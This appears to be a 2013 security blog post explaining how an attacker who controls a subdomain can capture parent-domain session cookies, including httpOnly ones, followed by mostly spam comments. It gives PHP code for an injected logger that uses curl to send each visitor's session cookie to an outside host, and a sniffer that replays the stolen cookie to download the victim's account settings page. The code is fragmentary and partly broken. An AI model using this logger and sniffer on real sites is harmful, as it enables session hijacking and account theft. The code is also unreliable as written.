понедельник, 8 апреля 2013 г.

Exploiting server-side vulns as client-side?!!

Sounds terrible, does not it? This post is obviously of course ;)

But sometimes this is effective attack vector, for example, whenever you can exploit any subdomain (news.your-target.com) but can not exploit main domain (your-target.com).

You can track cookies at any subdomain even if they were protected by httpOnly/Security.
Look to RFC6265 http://tools.ietf.org/html/rfc6265: The Domain Attribute
The Domain attribute specifies those hosts to which the cookie will be sent. For example, if the value of the Domain attribute is "example.com", the user agent will include the cookie in the Cookie header when making HTTP requests to example.com, www.example.com, and www.corp.example.com. (Note that a leading %x2E ("."), if present, is ignored even though that character is not permitted, but a trailing %x2E ("."), if present, will cause the user agent to ignore the attribute.) If the server omits the Domain attribute, the user agent will return the cookie only to the origin server.

Tracking cookies are possible when main server sending Set-cookie header with "domain" attribute.
Logger to inject into subdomain may looks like:
if(!isset($_COOKIE['session_id']) || !preg_match('/$ASYOUWANT^/s',$_COOKIE['session_id']) || isset($_SESSION['already_logged'])){
   //do nothing
   //exec called for asynchronous request
   exec("curl http://security-auditor.com/sniffer.php?session_id=".$_COOKIE['session_id'])." &";//httpOnly cookie of course
Simple code of described sniffer listed below:
$ssid = @$_GET['session_id'];
 // download page as a client
 $opts = array(
    'header'=>"Accept-language: en\r\n" .
              "Cookie: session_id=$ssid;\r\n"
 $context = stream_context_create($opts);
 $file = file_get_contents('https://target.com/settings', false, $context);
        file_put_contents("/tmp/sess-$ssid","Cookie: session_id=$ssid; \n".$file ); } }

17 комментариев:

  1. What if the sub-domain has a CMS i.e. Wordpress and main domain has static or another cms, does it work?

  2. There is no difference on subdomains CMS.
    If main domain sends "Set-cookie: " with domain= attribute this should work

  3. On the off chance that you don't have credit, or you have terrible credit, and you don't have the money, how is that bill paid? If not for payday advances, that bill wouldn't be paid.
    Check Cashing San-diego

  4. So in the event that you require money quick, a bank advance is not for you. Bank credits work preferred for arranged costs over for unanticipated money related crises.
    Cash Advance Chicago

  5. So what do you do? Given the innovative headway, you can essentially sign on to an online fund website that gives quick loans.
    Payday Loans Chula-vista

  6. Since this kind of advance is regularly less demanding to acquire than a conventional bank credit, you'll have the capacity to rapidly get the money you have to dispatch a mid year business. Car Title Loans

  7. Thanks for sharing, nice post! Post really provice useful information!

    Giaonhan247 chuyên dịch vụ mua cách mua hàng mỹ online và hướng dẫn cách mua hàng giá rẻ trên ebay cùng với chành xe vận chuyển hàng hóa đi campuchia và giải đáp nên mua gì trên ebay về VN uy tín hay mua hàng trên amazon có tính thuế không tính như thế nào.

  8. Thanks for sharing this..

    3E Accounting Malaysia is the best company to hire while Company registration

  9. دانلود سریال موچین

  10. دانلود سریال موچین

  11. دانلود سریال موچین

  12. Can you explain to me how this code works? I am new in servertsde system so I don't have any knowledge how it works. And if you can elaborate or explain it to me point by points. I will really appreciate it. On the other hand, while I am waiting for you to comeback, I will continue my playing and by the way, the game I am playing right now is granny 3. read more about this game by clicking the link here.

  13. Similar to a limited liability company, the owners of company shares can be either legal entities or natural persons. However, unlike a limited liability company, JSC shares can be bought and sold publicly. The maximum number of shares is unlimited and additional shares can be issued during the term of the company. There are different types of stocks, and typically the voting and dividend rights of shareholders depend on the category of stocks. Shareholders usually have the right to express their views on corporate governance and other matters such as the distribution of profits and the appointment of the council. All shareholder decisions are made during a shareholders' meeting. http://www.confiduss.com/en/info/blog/article/latvia-jsc-company-incorporation/